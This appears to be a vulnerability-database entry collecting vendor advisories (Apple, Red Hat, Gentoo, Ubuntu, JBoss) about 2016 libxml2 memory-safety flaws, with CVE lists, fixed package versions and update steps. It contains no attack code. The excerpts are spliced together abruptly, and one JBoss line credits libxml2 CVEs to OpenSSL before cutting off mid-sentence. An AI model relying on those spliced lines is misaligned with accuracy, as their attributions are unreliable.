|
var-201605-0465
|
The xmlPArserPrintFileContextInternal function in libxml2 before 2.9.4, as used in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1, allows remote attackers to cause a denial of service (heap-based buffer over-read) via a crafted XML document. Apple Mac OS X, watchOS, iOS, and tvOS are prone to multiple security vulnerabilities.
Attackers can exploit these issues to execute arbitrary code and bypass security restrictions. Failed exploit attempts may result in a denial-of-service condition.
Versions prior to iOS 9.3.2, watchOS 2.2.1, Mac OS X 10.11.5, and tvOS 9.2.1 are vulnerable. in the United States. Apple iOS is an operating system developed for mobile devices; watchOS is a smart watch operating system; OS X El Capitan is a dedicated operating system developed for Mac computers; tvOS is a smart TV operating system. It supports multiple encoding formats, XPath analysis, Well-formed and valid verification, etc.
CVE-ID
CVE-2016-1847 : Tongbo Luo and Bo Qu of Palo Alto Networks
Installation note:
Instructions on how to update your Apple Watch software are
available at https://support.apple.com/en-us/HT204641
To check the version on your Apple Watch, open the Apple Watch app
on your iPhone and select "My Watch > General > About". -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Important: libxml2 security update
Advisory ID: RHSA-2016:1292-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2016:1292
Issue date: 2016-06-23
CVE Names: CVE-2016-1762 CVE-2016-1833 CVE-2016-1834
CVE-2016-1835 CVE-2016-1836 CVE-2016-1837
CVE-2016-1838 CVE-2016-1839 CVE-2016-1840
CVE-2016-3627 CVE-2016-3705 CVE-2016-4447
CVE-2016-4448 CVE-2016-4449
=====================================================================
1. Summary:
An update for libxml2 is now available for Red Hat Enterprise Linux 6 and
Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
The libxml2 library is a development toolbox providing the implementation
of various XML standards. A remote attacker could provide a specially
crafted XML file that, when opened in an application linked against
libxml2, would cause the application to crash or execute arbitrary code
with the permissions of the user running the application. (CVE-2016-1834,
CVE-2016-1840)
Multiple denial of service flaws were found in libxml2. A remote attacker
could provide a specially crafted XML file that, when processed by an
application using libxml2, could cause that application to crash.
(CVE-2016-1762, CVE-2016-1833, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837,
CVE-2016-1838, CVE-2016-1839, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447,
CVE-2016-4448, CVE-2016-4449)
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all applications linked to the libxml2
library must be restarted, or the system rebooted.
5. Package List:
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
libxml2-2.7.6-21.el6_8.1.src.rpm
x86_64:
libxml2-2.7.6-21.el6_8.1.i686.rpm
libxml2-2.7.6-21.el6_8.1.x86_64.rpm
libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm
libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm
libxml2-python-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64:
libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm
libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm
libxml2-devel-2.7.6-21.el6_8.1.i686.rpm
libxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm
libxml2-static-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
libxml2-2.7.6-21.el6_8.1.src.rpm
i386:
libxml2-2.7.6-21.el6_8.1.i686.rpm
libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm
libxml2-devel-2.7.6-21.el6_8.1.i686.rpm
libxml2-python-2.7.6-21.el6_8.1.i686.rpm
ppc64:
libxml2-2.7.6-21.el6_8.1.ppc.rpm
libxml2-2.7.6-21.el6_8.1.ppc64.rpm
libxml2-debuginfo-2.7.6-21.el6_8.1.ppc.rpm
libxml2-debuginfo-2.7.6-21.el6_8.1.ppc64.rpm
libxml2-devel-2.7.6-21.el6_8.1.ppc.rpm
libxml2-devel-2.7.6-21.el6_8.1.ppc64.rpm
libxml2-python-2.7.6-21.el6_8.1.ppc64.rpm
s390x:
libxml2-2.7.6-21.el6_8.1.s390.rpm
libxml2-2.7.6-21.el6_8.1.s390x.rpm
libxml2-debuginfo-2.7.6-21.el6_8.1.s390.rpm
libxml2-debuginfo-2.7.6-21.el6_8.1.s390x.rpm
libxml2-devel-2.7.6-21.el6_8.1.s390.rpm
libxml2-devel-2.7.6-21.el6_8.1.s390x.rpm
libxml2-python-2.7.6-21.el6_8.1.s390x.rpm
x86_64:
libxml2-2.7.6-21.el6_8.1.i686.rpm
libxml2-2.7.6-21.el6_8.1.x86_64.rpm
libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm
libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm
libxml2-devel-2.7.6-21.el6_8.1.i686.rpm
libxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm
libxml2-python-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386:
libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm
libxml2-static-2.7.6-21.el6_8.1.i686.rpm
ppc64:
libxml2-debuginfo-2.7.6-21.el6_8.1.ppc64.rpm
libxml2-static-2.7.6-21.el6_8.1.ppc64.rpm
s390x:
libxml2-debuginfo-2.7.6-21.el6_8.1.s390x.rpm
libxml2-static-2.7.6-21.el6_8.1.s390x.rpm
x86_64:
libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm
libxml2-static-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
libxml2-2.7.6-21.el6_8.1.src.rpm
i386:
libxml2-2.7.6-21.el6_8.1.i686.rpm
libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm
libxml2-devel-2.7.6-21.el6_8.1.i686.rpm
libxml2-python-2.7.6-21.el6_8.1.i686.rpm
x86_64:
libxml2-2.7.6-21.el6_8.1.i686.rpm
libxml2-2.7.6-21.el6_8.1.x86_64.rpm
libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm
libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm
libxml2-devel-2.7.6-21.el6_8.1.i686.rpm
libxml2-devel-2.7.6-21.el6_8.1.x86_64.rpm
libxml2-python-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386:
libxml2-debuginfo-2.7.6-21.el6_8.1.i686.rpm
libxml2-static-2.7.6-21.el6_8.1.i686.rpm
x86_64:
libxml2-debuginfo-2.7.6-21.el6_8.1.x86_64.rpm
libxml2-static-2.7.6-21.el6_8.1.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source:
libxml2-2.9.1-6.el7_2.3.src.rpm
x86_64:
libxml2-2.9.1-6.el7_2.3.i686.rpm
libxml2-2.9.1-6.el7_2.3.x86_64.rpm
libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm
libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm
libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm
libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm
libxml2-devel-2.9.1-6.el7_2.3.i686.rpm
libxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm
libxml2-static-2.9.1-6.el7_2.3.i686.rpm
libxml2-static-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
libxml2-2.9.1-6.el7_2.3.src.rpm
x86_64:
libxml2-2.9.1-6.el7_2.3.i686.rpm
libxml2-2.9.1-6.el7_2.3.x86_64.rpm
libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm
libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm
libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm
libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm
libxml2-devel-2.9.1-6.el7_2.3.i686.rpm
libxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm
libxml2-static-2.9.1-6.el7_2.3.i686.rpm
libxml2-static-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
libxml2-2.9.1-6.el7_2.3.src.rpm
ppc64:
libxml2-2.9.1-6.el7_2.3.ppc.rpm
libxml2-2.9.1-6.el7_2.3.ppc64.rpm
libxml2-debuginfo-2.9.1-6.el7_2.3.ppc.rpm
libxml2-debuginfo-2.9.1-6.el7_2.3.ppc64.rpm
libxml2-devel-2.9.1-6.el7_2.3.ppc.rpm
libxml2-devel-2.9.1-6.el7_2.3.ppc64.rpm
libxml2-python-2.9.1-6.el7_2.3.ppc64.rpm
ppc64le:
libxml2-2.9.1-6.el7_2.3.ppc64le.rpm
libxml2-debuginfo-2.9.1-6.el7_2.3.ppc64le.rpm
libxml2-devel-2.9.1-6.el7_2.3.ppc64le.rpm
libxml2-python-2.9.1-6.el7_2.3.ppc64le.rpm
s390x:
libxml2-2.9.1-6.el7_2.3.s390.rpm
libxml2-2.9.1-6.el7_2.3.s390x.rpm
libxml2-debuginfo-2.9.1-6.el7_2.3.s390.rpm
libxml2-debuginfo-2.9.1-6.el7_2.3.s390x.rpm
libxml2-devel-2.9.1-6.el7_2.3.s390.rpm
libxml2-devel-2.9.1-6.el7_2.3.s390x.rpm
libxml2-python-2.9.1-6.el7_2.3.s390x.rpm
x86_64:
libxml2-2.9.1-6.el7_2.3.i686.rpm
libxml2-2.9.1-6.el7_2.3.x86_64.rpm
libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm
libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm
libxml2-devel-2.9.1-6.el7_2.3.i686.rpm
libxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm
libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
libxml2-debuginfo-2.9.1-6.el7_2.3.ppc.rpm
libxml2-debuginfo-2.9.1-6.el7_2.3.ppc64.rpm
libxml2-static-2.9.1-6.el7_2.3.ppc.rpm
libxml2-static-2.9.1-6.el7_2.3.ppc64.rpm
ppc64le:
libxml2-debuginfo-2.9.1-6.el7_2.3.ppc64le.rpm
libxml2-static-2.9.1-6.el7_2.3.ppc64le.rpm
s390x:
libxml2-debuginfo-2.9.1-6.el7_2.3.s390.rpm
libxml2-debuginfo-2.9.1-6.el7_2.3.s390x.rpm
libxml2-static-2.9.1-6.el7_2.3.s390.rpm
libxml2-static-2.9.1-6.el7_2.3.s390x.rpm
x86_64:
libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm
libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm
libxml2-static-2.9.1-6.el7_2.3.i686.rpm
libxml2-static-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
libxml2-2.9.1-6.el7_2.3.src.rpm
x86_64:
libxml2-2.9.1-6.el7_2.3.i686.rpm
libxml2-2.9.1-6.el7_2.3.x86_64.rpm
libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm
libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm
libxml2-devel-2.9.1-6.el7_2.3.i686.rpm
libxml2-devel-2.9.1-6.el7_2.3.x86_64.rpm
libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
libxml2-debuginfo-2.9.1-6.el7_2.3.i686.rpm
libxml2-debuginfo-2.9.1-6.el7_2.3.x86_64.rpm
libxml2-static-2.9.1-6.el7_2.3.i686.rpm
libxml2-static-2.9.1-6.el7_2.3.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2016-1762
https://access.redhat.com/security/cve/CVE-2016-1833
https://access.redhat.com/security/cve/CVE-2016-1834
https://access.redhat.com/security/cve/CVE-2016-1835
https://access.redhat.com/security/cve/CVE-2016-1836
https://access.redhat.com/security/cve/CVE-2016-1837
https://access.redhat.com/security/cve/CVE-2016-1838
https://access.redhat.com/security/cve/CVE-2016-1839
https://access.redhat.com/security/cve/CVE-2016-1840
https://access.redhat.com/security/cve/CVE-2016-3627
https://access.redhat.com/security/cve/CVE-2016-3705
https://access.redhat.com/security/cve/CVE-2016-4447
https://access.redhat.com/security/cve/CVE-2016-4448
https://access.redhat.com/security/cve/CVE-2016-4449
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFXa8B8XlSAg2UNWIIRAh9ZAJ99xgPhOaIopIxmynm+vlDcmw4jFACeLvTm
ZsVLEgJAF0Zt6xZVzqvVW7U=
=fREV
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2016-05-16-2 iOS 9.3.2
iOS 9.3.2 is now available and addresses the following:
Accessibility
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An application may be able to determine kernel memory layout
Description: A buffer overflow was addressed through improved size
validation.
CVE-ID
CVE-2016-1790 : Rapelly Akhil
CFNetwork Proxies
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker in a privileged network position may be able to
leak sensitive user information
Description: An information leak existed in the handling of HTTP and
HTTPS requests. This issue was addressed through improved URL
handling.
CVE-ID
CVE-2016-1801 : Alex Chapman and Paul Stone of Context Information
Security
CommonCrypto
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to leak sensitive user
information
Description: An issue existed in the handling of return values in
CCCrypt. This issue was addressed through improved key length
management.
CVE-ID
CVE-2016-1802 : Klaus Rodewig
CoreCapture
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A null pointer dereference was addressed through
improved validation.
CVE-ID
CVE-2016-1803 : Ian Beer of Google Project Zero, daybreaker working
with Trend Micro’s Zero Day Initiative
Disk Images
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local attacker may be able to read kernel memory
Description: A race condition was addressed through improved
locking.
CVE-ID
CVE-2016-1807 : Ian Beer of Google Project Zero
Disk Images
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue existed in the parsing of
disk images. This issue was addressed through improved memory
handling.
CVE-ID
CVE-2016-1808 : Moony Li (@Flyic) and Jack Tang (@jacktang310) of
Trend Micro
ImageIO
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Processing a maliciously crafted image may lead to a denial
of service
Description: A null pointer dereference was addressed through
improved validation.
CVE-ID
CVE-2016-1811 : Lander Brandt (@landaire)
IOAcceleratorFamily
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: Multiple memory corruption issues were addressed
through improved memory handling.
CVE-ID
CVE-2016-1817 : Moony Li (@Flyic) and Jack Tang (@jacktang310) of
Trend Micro working with Trend Micro's Zero Day Initiative
CVE-2016-1818 : Juwei Lin of TrendMicro
CVE-2016-1819 : Ian Beer of Google Project Zero
IOAcceleratorFamily
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An application may be able to cause a denial of service
Description: A null pointer dereference was addressed through
improved locking.
CVE-ID
CVE-2016-1814 : Juwei Lin of TrendMicro
IOAcceleratorFamily
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A null pointer dereference was addressed through
improved validation.
CVE-ID
CVE-2016-1813 : Ian Beer of Google Project Zero
IOHIDFamily
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed through
improved memory handling.
CVE-ID
CVE-2016-1823 : Ian Beer of Google Project Zero
CVE-2016-1824 : Marco Grassi (@marcograss) of KeenLab (@keen_lab),
Tencent
Kernel
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: Multiple memory corruption issues were addressed
through improved memory handling.
CVE-ID
CVE-2016-1827 : Brandon Azad
CVE-2016-1828 : Brandon Azad
CVE-2016-1829 : CESG
CVE-2016-1830 : Brandon Azad
CVE-2016-1831 : Brandon Azad
libc
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local attacker may be able to cause unexpected application
termination or arbitrary code execution
Description: A memory corruption issue was addressed through
improved input validation.
CVE-ID
CVE-2016-1832 : Karl Williamson
libxml2
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Processing maliciously crafted XML may lead to an unexpected
application termination or arbitrary code execution
Description: Multiple memory corruption issues were addressed
through improved memory handling.
CVE-ID
CVE-2016-1833 : Mateusz Jurczyk
CVE-2016-1834 : Apple
CVE-2016-1835 : Wei Lei and Liu Yang of Nanyang Technological
University
CVE-2016-1836 : Wei Lei and Liu Yang of Nanyang Technological
University
CVE-2016-1837 : Wei Lei and Liu Yang of Nanyang Technological
University
CVE-2016-1838 : Mateusz Jurczyk
CVE-2016-1839 : Mateusz Jurczyk
CVE-2016-1840 : Kostya Serebryany
libxslt
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to arbitrary
code execution
Description: A memory corruption issue was addressed through
improved memory handling.
CVE-ID
CVE-2016-1841 : Sebastian Apelt
MapKit
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker in a privileged network position may be able to
leak sensitive user information
Description: Shared links were sent with HTTP rather than HTTPS.
This was addressed by enabling HTTPS for shared links.
CVE-ID
CVE-2016-1842 : Richard Shupak (https://www.linkedin.com/in/rshupak)
OpenGL
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed
through improved memory handling.
CVE-ID
CVE-2016-1847 : Tongbo Luo and Bo Qu of Palo Alto Networks
Safari
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A user may be unable to fully delete browsing history
Description: "Clear History and Website Data" did not clear the
history. The issue was addressed through improved data deletion.
CVE-ID
CVE-2016-1849 : Adham Ghrayeb
Siri
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to an iOS device may be able
to use Siri to access contacts and photos from the the lock screen
Description: A state management issue existed when accessing Siri
results on the lock screen. This issue was addressed by disabling
data detectors in Twitter results when the device is locked.
CVE-ID
CVE-2016-1852 : videosdebarraquito
WebKit
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a malicious website may disclose data from another
website
Description: An insufficient taint tracking issue in the parsing of
svg images was addressed through improved taint tracking.
CVE-ID
CVE-2016-1858 : an anonymous researcher
WebKit
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to arbitrary
code execution
Description: Multiple memory corruption issues were addressed
through improved memory handling.
CVE-ID
CVE-2016-1854 : Anonymous working with Trend Micro's Zero Day
Initiative
CVE-2016-1855 : Tongbo Luo and Bo Qu of Palo Alto Networks
CVE-2016-1856 : lokihardt working with Trend Micro's Zero Day
Initiative
CVE-2016-1857 : Jeonghoon Shin@A.D.D, Liang Chen, Zhen Feng, wushi of
KeenLab, Tencent working with Trend Micro's Zero Day Initiative
WebKit Canvas
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to arbitrary
code execution
Description: Multiple memory corruption issues were addressed
through improved memory handling.
CVE-ID
CVE-2016-1859 : Liang Chen, wushi of KeenLab, Tencent working with
Trend Micro's Zero Day Initiative
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "9.3.2". - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201701-37
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: libxml2: Multiple vulnerabilities
Date: January 16, 2017
Bugs: #564776, #566374, #572878, #573820, #577998, #582538,
#582540, #583888, #589816, #597112, #597114, #597116
ID: 201701-37
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in libxml2, the worst of which
could lead to the execution of arbitrary code.
Background
==========
libxml2 is the XML (eXtended Markup Language) C parser and toolkit
initially developed for the Gnome project.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/libxml2 < 2.9.4-r1 >= 2.9.4-r1
Description
===========
Multiple vulnerabilities have been discovered in libxml2. Please review
the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All libxml2 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.9.4-r1"
References
==========
[ 1 ] CVE-2015-1819
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1819
[ 2 ] CVE-2015-5312
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5312
[ 3 ] CVE-2015-7497
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7497
[ 4 ] CVE-2015-7498
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7498
[ 5 ] CVE-2015-7499
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7499
[ 6 ] CVE-2015-7500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7500
[ 7 ] CVE-2015-7941
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7941
[ 8 ] CVE-2015-7942
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7942
[ 9 ] CVE-2015-8035
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8035
[ 10 ] CVE-2015-8242
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8242
[ 11 ] CVE-2015-8806
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8806
[ 12 ] CVE-2016-1836
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1836
[ 13 ] CVE-2016-1838
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1838
[ 14 ] CVE-2016-1839
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1839
[ 15 ] CVE-2016-1840
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1840
[ 16 ] CVE-2016-2073
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2073
[ 17 ] CVE-2016-3627
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3627
[ 18 ] CVE-2016-3705
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3705
[ 19 ] CVE-2016-4483
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4483
[ 20 ] CVE-2016-4658
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4658
[ 21 ] CVE-2016-5131
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5131
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201701-37
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2017 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. From: Marc Deslauriers <marc.deslauriers@canonical.com>
Reply-To: Ubuntu Security <security@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Message-ID: <5755B7E3.5040103@canonical.com>
Subject: [USN-2994-1] libxml2 vulnerabilities
============================================================================
Ubuntu Security Notice USN-2994-1
June 06, 2016
libxml2 vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 15.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in libxml2. (CVE-2015-8806, CVE-2016-2073,
CVE-2016-3627, CVE-2016-3705, CVE-2016-4447)
It was discovered that libxml2 incorrectly handled certain malformed
documents.
(CVE-2016-1762, CVE-2016-1834)
Mateusz Jurczyk discovered that libxml2 incorrectly handled certain
malformed documents. (CVE-2016-1833, CVE-2016-1838, CVE-2016-1839)
Wei Lei and Liu Yang discovered that libxml2 incorrectly handled certain
malformed documents. (CVE-2016-1835, CVE-2016-1837)
Wei Lei and Liu Yang discovered that libxml2 incorrectly handled certain
malformed documents. This issue only applied to Ubuntu 14.04 LTS, Ubuntu 15.10 and
Ubuntu 16.04 LTS. (CVE-2016-1836)
Kostya Serebryany discovered that libxml2 incorrectly handled certain
malformed documents. (CVE-2016-1840)
It was discovered that libxml2 would load certain XML external entities. (CVE-2016-4449)
Gustavo Grieco discovered that libxml2 incorrectly handled certain
malformed documents. (CVE-2016-4483)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 16.04 LTS:
libxml2 2.9.3+dfsg1-1ubuntu0.1
Ubuntu 15.10:
libxml2 2.9.2+zdfsg1-4ubuntu0.4
Ubuntu 14.04 LTS:
libxml2 2.9.1+dfsg1-3ubuntu4.8
Ubuntu 12.04 LTS:
libxml2 2.7.8.dfsg-5.1ubuntu4.15
After a standard system update you need to reboot your computer to make
all the necessary changes. Description:
This release of Red Hat JBoss Core Services httpd 2.4.23 serves as a
replacement for JBoss Core Services Apache HTTP Server 2.4.6.
Security Fix(es):
* This update fixes several flaws in OpenSSL. (CVE-2016-1762,
CVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837,
CVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705,
CVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)
* This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420,
CVE-2016-7141)
* This update fixes two flaws in httpd. (CVE-2016-4459,
CVE-2016-8612)
* A buffer overflow flaw when concatenating virtual host names and URIs was
fixed in mod_jk. (CVE-2016-6808)
* A memory leak flaw was fixed in expat. Upstream acknowledges Stephen Henson (OpenSSL development team)
as the original reporter of CVE-2015-0286; Huzaifa Sidhpurwala (Red Hat),
Hanno BAPck, and David Benjamin (Google) as the original reporters of
CVE-2016-2108; Guido Vranken as the original reporter of CVE-2016-2105,
CVE-2016-2106, CVE-2016-0797, CVE-2016-0799, and CVE-2016-2842; Juraj
Somorovsky as the original reporter of CVE-2016-2107; Yuval Yarom
(University of Adelaide and NICTA), Daniel Genkin (Technion and Tel Aviv
University), and Nadia Heninger (University of Pennsylvania) as the
